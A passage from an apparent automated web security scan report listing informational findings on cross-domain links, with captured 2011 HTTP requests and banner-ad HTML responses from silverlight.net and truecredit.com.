Content-Length: 363


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2502&SiteID=2&RandomNumber=1170871985&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/silverlight_300x250_1110.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.589. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=38&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:19 GMT
Content-Length: 363


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=38&CampaignID=1848&AdvertiserID=12&BannerID=2502&SiteID=2&RandomNumber=1017522409&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/silverlight_300x250_1110.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.590. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=475 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:20 GMT
Content-Length: 285


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=475&CampaignID=1917&AdvertiserID=12&BannerID=2644&SiteID=2&RandomNumber=1282954232&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/pushdown.gif" alt="CompOnePushDown"></a>
...[SNIP]...

23.591. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:51 GMT
Content-Length: 410


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=703&AdvertiserID=31&BannerID=563&SiteID=6&RandomNumber=1429908323&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/aspnet_728x90_0311.gif" width="728" height="90" alt="Advertising - ComponentOne" align="Center" border="0"></a>
...[SNIP]...

23.592. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:53 GMT
Content-Length: 388


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=389&CampaignID=2012&AdvertiserID=209&BannerID=2757&SiteID=2&RandomNumber=1443064544&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/dotfuscator_ad3.0_728x90.gif" width="728" height="90" alt="Advertising - PreEmptive" align="Center" border="0"></a>
...[SNIP]...

23.593. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=476 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:55 GMT
Content-Length: 529


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=382138676&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/LDN.120x90.png" /></a>
<p>Practical video tutorials for Silverlight, WPF, AJAX, ASP.NET & more.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=382138676&Keywords=" target="_blank">
Learn More</a>
...[SNIP]...

23.594. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=474 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wnwczr55budo0sz2rgg0wk45; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:55:07 GMT
Content-Length: 257


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=474&CampaignID=1914&AdvertiserID=12&BannerID=2641&SiteID=2&RandomNumber=917188207&Keywords=" class="icon_sponsor" target="_blank">Less Coding, More Logic</a>
...[SNIP]...

23.595. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/learn/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:54 GMT
Content-Length: 451


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=401&CampaignID=2065&AdvertiserID=40&BannerID=2792&SiteID=2&RandomNumber=844593542&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/728x90DASP_bluylwwht_silverlighthosting_5m_SM.gif" width="728" height="90" alt="Silverlight Hosting for Only $5/month! Click Here and Sign Up Today!" align="Center" border="0"></a>
...[SNIP]...

23.596. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=473 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:21 GMT
Content-Length: 274


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=473&CampaignID=1915&AdvertiserID=12&BannerID=2642&SiteID=2&RandomNumber=1718366155&Keywords=" class="icon_sponsor" target="_blank">
Less Coding, More Logic: ComponentOne</a>
...[SNIP]...

23.597. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=401&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:58:19 GMT
Content-Length: 412


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=725&AdvertiserID=14&BannerID=595&SiteID=6&RandomNumber=108470082&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/LDN.videos.728.429.gen.gif" width="728" height="90" alt="Advertising - LearnDevNow" align="Center" border="0"></a>
...[SNIP]...

23.598. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=476 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:39 GMT
Content-Length: 531


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=1497337388&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/LDN.120x90.png" /></a>
<p>Practical video tutorials for Silverlight, WPF, AJAX, ASP.NET & more.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=1497337388&Keywords=" target="_blank">
Learn More</a>
...[SNIP]...

23.599. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:38 GMT
Content-Length: 394


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=58&CampaignID=740&AdvertiserID=4&BannerID=516&SiteID=6&RandomNumber=1329693220&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/728-NMG-Blue.gif" width="728" height="90" alt="Advertising - NMG" align="Center" border="0"></a>
...[SNIP]...

23.600. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=476 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: ""

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:59 GMT
Content-Length: 529


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=537010836&Keywords=" target="_blank">
<img src="http://ads.asp.net/ads/LDN.120x90.png" /></a>
<p>Practical video tutorials for Silverlight, WPF, AJAX, ASP.NET & more.
<a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=476&CampaignID=1955&AdvertiserID=124&BannerID=2684&SiteID=2&RandomNumber=537010836&Keywords=" target="_blank">
Learn More</a>
...[SNIP]...

23.601. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=465&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/devices/windows-phone/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=3zjy2wuzljzwkg55m1g0ig55; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:45 GMT
Content-Length: 371


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=465&CampaignID=1858&AdvertiserID=9&BannerID=2821&SiteID=2&RandomNumber=1797534597&Keywords=" target="_Blank"><img src="http://ads.asp.net/ads/WP7_300x250.jpg" width="300" height="250" alt="Advertising - Telerik" align="Center" border="0"></a>
...[SNIP]...

23.602. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /adchain.html?Task=Get&ifr=true&SiteID=2&xml=true&ZoneID=477 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getstarted/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:53:52 GMT
Content-Length: 261


<html><head></head><body><a href="http://ads.asp.net/a.aspx?Task=Click&ZoneID=477&CampaignID=1954&AdvertiserID=12&BannerID=2680&SiteID=2&RandomNumber=1577270283&Keywords=" target="_blank" class="icon_sponsor">
140+ Silverlight Samples</a>
...[SNIP]...

23.603. http://www.silverlight.net/adchain.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.silverlight.net
Path:   /adchain.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /adchain.html?ZoneID=37&Task=Get&ifr=true&SiteID=2 HTTP/1.1
Host: www.silverlight.net
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; ASP.NET_SessionId=qb0020bpbi3hk5nc1lpe0b2l

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:52:58 GMT
Content-Length: 393


<html><head></head><body><body bgcolor="#FFFFFF"><a href="http://ads.neudesicmediagroup.com/a.aspx?Task=Click&ZoneID=54&CampaignID=735&AdvertiserID=15&BannerID=449&SiteID=6&RandomNumber=172149675&Keywords=" target="_Blank"><img src="http://ads.neudesicmediagroup.com/ads/2_300x250_TFS_VS2010book_SM.gif" width="300" height="250" alt="" align="Center" border="0"></a>
...[SNIP]...

23.604. https://www.truecredit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?cb=credit HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le; s_pers=%20s_visit%3D1%7C1303676208552%3B%20s_depth%3D1%7C1303676208554%3B%20dfa_cookie%3Dtuitruecredit%7C1303676208557%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674408560'%255D%255D%7C1461527208560%3B%20s_nr%3D1303674408563%7C1306266408563%3B%20s_vnum%3D1306266408564%2526vn%253D1%7C1306266408564%3B%20s_invisit%3Dtrue%7C1303676208564%3B%20s_lv%3D1303674408567%7C1398282408567%3B%20s_lv_s%3DFirst%2520Visit%7C1303676208567%3B%20s_pv%3Dtc%253Ahttps%253A%252F%252Fwww.truecredit.com%252Fproducts%252Forder2.jsp%253Fpackage%253DTriBureauCMUStartupfee%2526cb%253Dcredit%2526formName%253DfreeTriBureauCMUChoice%2526refid%253D20110324-174a3c150b7e7f3b565b%7C1303676208571%3B; s_sess=%20s_cc%3Dtrue%3B%20ttc%3D1303674408562%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D100%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:15:30 GMT
Server: Apache
cache-control: no-cache,must-revalidate
pragma: no-cache
Expires: -1
Set-Cookie: TLSESSIONID=1303676130100
Set-Cookie: JSESSIONID=aI2zc6tC6-qf; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 29076


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<link rel="shortcut icon" href="https://www.truecredit.com/Shortcut_Icon_TU.ico" type="image/x-icon">

<TITLE>On
...[SNIP]...
<td width="354" valign="middle"><a href="https://www.Credit.com" ><img src="/Cob/credit/images/custom_header_en.jpg" height="60" width="350" border="0" alt="" />
...[SNIP]...
</a>&nbsp;|


